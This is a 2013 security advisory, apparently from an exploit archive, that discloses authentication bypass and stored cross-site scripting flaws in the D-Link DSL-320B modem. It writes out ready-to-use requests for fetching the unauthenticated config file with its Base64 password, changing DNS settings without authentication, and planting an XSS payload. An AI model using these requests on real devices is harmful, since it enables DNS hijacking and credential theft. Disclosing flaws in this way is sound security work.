D-Link DSL-320B Authentication Bypass / Cross Site Scripting

D-Link DSL-320B Authentication Bypass / Cross Site Scripting: Posted May 6, 2013; Authored by Michael Messner; D-Link DSL-320B suffers from persistent cross site scripting and multiple authentication bypass bypass vulnerabilities.; tags | exploit, vulnerability, xss, bypass; SHA-256 | 39f8eb0877b4a1479fcf473272af42277ef75ed9a0c42219a8756b0d491a8ad4; Download | Favorite | View

D-Link DSL-320B Authentication Bypass / Cross Site Scripting

Device: DSL-320B

Firmware Version: EU_DSL-320B v1.23 date: 28.12.2010

Vendor URL: http://www.dlink.com/de/de/home-solutions/connect/modems-and-gateways/dsl-320b-adsl-2-ethernet-modem

============ Vulnerability Overview: ============  

* Access to the Config file without authentication => full authentication bypass possible! :): (1)

192.168.178.111/config.bin

===<snip>====
<sysUserName value="admin"/>
<zipb enable="1"/>
<dns dynamic="disable" primary="1.1.1.1" secondary="2.2.2.3" domain="Home" host="alpha"/>
<sysPassword value="dGVzdA=="/>
===<snip>====

=> sysPassword is Base64 encoded

* Access to the logfile without authentication: (1)
192.168.178.111/status/status_log.sys

* Change the DNS Settings without authentication: (1)
http://192.168.178.111/advanced/adv_dns.xgi?&SET/dns/mode=0&SET/dns/mode/server/primarydns=1.1.1.1&SET/dns/mode/server/secondarydns=2.2.2.2

* Stored XSS within parental control (2):
  
  => Parameter: set/bwlist/entry:1/hostname
  
Request:
http://192.168.178.111/home/home_parent.xgi?&set/bwlist/enable=1&set/bwlist/bw_status=0&set/bwlist/entry:1/bw_flag=0&set/bwlist/entry:1/hostname=%22%3E%3Cimg%20src=%220%22%20onerror=alert(1)%3E&set/bwlist/entry:1/weekday=6&set/bwlist/entry:1/begintime=00:00&set/bwlist/entry:1/endtime=23:59&set/bwlist/entry:1/store=1&set/bwlist/apply=1

Again you are able to place this XSS without authentication. :)

* Login Credentials in HTTP GET are not a good idea => use HTTP Post! (3)
http://192.168.178.111/login.xgi?user=admin&pass=admin1

* Credentials in HTTP GET via password change request are not a good idea => use HTTP Post!: (3)
http://192.168.178.111/tools/tools_admin.xgi?&set/sys/account/user/oldpwd=admin&set/sys/account/user/password=test&CMT=1

============ Solution ============

Update to firmware version 1.25:

(1) - fixed
(2) - not fixed but authentication needed
(3) - not fixed

============ Credits ============

The vulnerability was discovered by Michael Messner
Mail: devnull#at#s3cur1ty#dot#de
Web: http://www.s3cur1ty.de/advisories
Twitter: @s3cur1ty_de

============ Time Line: ============

17.03.2012 - discovered vulnerabilities
17.03.2013 - informed vendor about the vulnerabilities
25.04.2013 - tested beta version from vendor
30.04.2013 - vendor releases patch
06.05.2013 - public disclosure

===================== Advisory end =====================

Top Authors In Last 30 Days

Red Hat 239 files
Ubuntu 58 files
Debian 20 files
LiquidWorm 19 files
Apple 9 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files
nu11secur1ty 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,862)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,265)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,976)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

D-Link DSL-320B Authentication Bypass / Cross Site Scripting

D-Link DSL-320B Authentication Bypass / Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

D-Link DSL-320B Authentication Bypass / Cross Site Scripting

Share This

D-Link DSL-320B Authentication Bypass / Cross Site Scripting

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems